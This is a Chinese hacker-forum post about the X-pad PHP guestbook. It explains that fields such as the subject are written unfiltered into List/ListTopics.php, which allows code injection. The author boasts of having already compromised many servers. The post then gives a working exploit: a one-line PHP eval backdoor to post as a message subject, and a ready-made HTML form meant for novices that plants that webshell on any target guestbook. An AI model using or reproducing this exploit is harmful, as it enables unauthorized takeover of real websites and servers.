网络安全 频道

X-pad留言本存在极大的安全问题


      漏洞整理:笨鱼(火狐 [ F S T ]
       FireFox技术交流论坛
    http://www.wrsky.com
    临时访问地址
    http://firefoxer.nease.net
    It is all beginnings free
    It is all ruin to be privately owned
***************************************************************
其实老早以前偶就发现了,还拿了不少肉鸡,不好意思了!!!
现在给大家看看吧~~呵呵,某鱼对得起兄弟吧`~~表砸我!
下面写原因和利用方式!!!
***************************************************************
此套程序可以搜索http://www.baidu.com/baidu?wd=x-pad&cl=3x-pad这个关键词。。
关于此留言本,我找到一个修改版本的描绘:
“基于文本的php留言本,安装方便,功能强大,安全性好,外观自定义性强,是一款非常实用的留言本,http://7y2.51.net/gb”
安全性不是他说得算的。。。我们来看!
***************************************************************
我们先看他关于数据写入的部分

        class Post
        {
                function Main()
                {
                        global $General, $HTTP_POST_VARS, $User, $txt;
                        if(Invalid($HTTP_POST_VARS[user]))
                        {
                                $Main = Prompt("$txt[168]", "index.php?mod=register");
                        }
                        elseif(trim(($HTTP_POST_VARS[name]) != "" || $User->Auth) && trim($HTTP_POST_VARS[subject]) != "" && trim($HTTP_POST_VARS[message]) != "")
                        {
                                if($User->Auth)
                                {
                                        $PosterName = $User->Name;
                                        $Email                = $User->Email;
                                        $HomePage        = $User->Homepage;
                                        $QQ                        = $User->QQ;
                                        $Flag                = 1;
                                }
                                else
                                {
                                        if($HTTP_POST_VARS[psw] == "")
                                        {
                                                $PosterName = $HTTP_POST_VARS[name];
                                                $Email                = $HTTP_POST_VARS[email];
                                                $HomePage        = $HTTP_POST_VARS[homepageurl];
                                                $QQ                        = $HTTP_POST_VARS[qq];
                                                $Flag                = 0;
                                        }
                                        elseif(Verify($HTTP_POST_VARS[name], $HTTP_POST_VARS[psw]))
                                        {
                                                include ("Users/$HTTP_POST_VARS[name].php");
                                                $PosterName = $HTTP_POST_VARS[name];
                                                $Email                = $User_EMail;
                                                $HomePage        = $User_Homepage;
                                                $QQ                        = $User_QQ;
                                                $Flag                = 1;
                                        }
                                        else
                                        {
                                                $Main = Prompt("$txt[169]", "index.php?mod=post");
                                                return $Main;
                                        }
                                }
                                include ("Sources/SRC_list.php");
                                $idx->Open();
                                $idx->Add($HTTP_POST_VARS[subject], $PosterName, $Email, $HomePage, $QQ, $HTTP_POST_VARS[message], $Flag, $HTTP_POST_VARS[ns] ? "1" : "0");
                                $idx->Close();


呵呵,从这句看吧~
$Email                = $HTTP_POST_VARS[email];
呵呵,没有经过任何检验,从那来就直接用了!
呵呵,仔细看这段代码!!
include ("Sources/SRC_list.php");
                                $idx->Open();
                                $idx->Add($HTTP_POST_VARS[subject], $PosterName, $Email, $HomePage, $QQ, $HTTP_POST_VARS[message], $Flag, $HTTP_POST_VARS[ns] ? "1" : "0");
                                $idx->Close();


呵呵,看到了没有?没看到仔细点啊~~数据写的部分要关心喔!!
在给你看看Sources/SRC_list.php里怎么写的,我晕,他怎么到处引用数据啊!

                        $opt = FileWrite($Settings->ListTopicsFile, $data);
                        


数据处理的好复杂啊~很难讲清楚,大家下代码看一下就知道了。其实IP还有浏览器的信息另外还有就是主题都没有过滤直接写进了./List/ListTopics.php这个文件里~呼,真是无语啊!安全真是不到家!
解释完毕,要有不明白继续讨论?
**************************************************************
利用方式:
找到一款留言本,点留言,在主题写代码!呵呵,假设要注册才可以留言咱就注册咯,关于注册再说一句,注册部分也没过滤!!!这个自行研究了!
比如一句话后门!

<?eval($_POST[1234]);?>


再用lanker一句话后门客户端连接
http://www.xxx.com/留言本/List/ListTopics.php
这个文件,假设是winnt的主机,恭喜你,你已经占领这个地区!
只是提供思路,火狐不主张利用此技术进行攻击,所有因此文发生的后果与作者和火狐无关!!
***************************************************************
漏洞简易利用方式,适合菜鸟,实在很菜的话!
把下面代码保存为.html。然后打开,添写地址,会给你把webshell写进去!
切记。php中"会被转\"请不要写包含"的东西!!
代码:
<center>
<h2>火狐XPAD漏洞利用程序</h2><cenrer>
<center><form method="post" target="_blank">
地址: <input name="theAction" type="text" id="theAction" value="http://漏洞地址/index.php?mod=post" size="45">
<br><input type="hidden" name="name" value="邮递员">
webshell:<input type=text name="subject" value="<?eval($_POST[1234]);?>" size=58 maxlength=58>不懂别改
<input type="hidden" name="message" value="HI,帅哥,我来了!!"><br>
<input type="submit" name="Submit3" value="提 交" onClick="action=theAction.value;">
        <input type="reset" name="Submit32" value="重 置">
        <input type="button" name="Submit4" value="提 示" onClick="alert('请选择存在漏洞的留言本地址\n其他的东西不懂的话请不要修改\n目前位置暂时这样了。。。。');">
    </form>
</center>


呵呵,完毕了完毕了!!
0
相关文章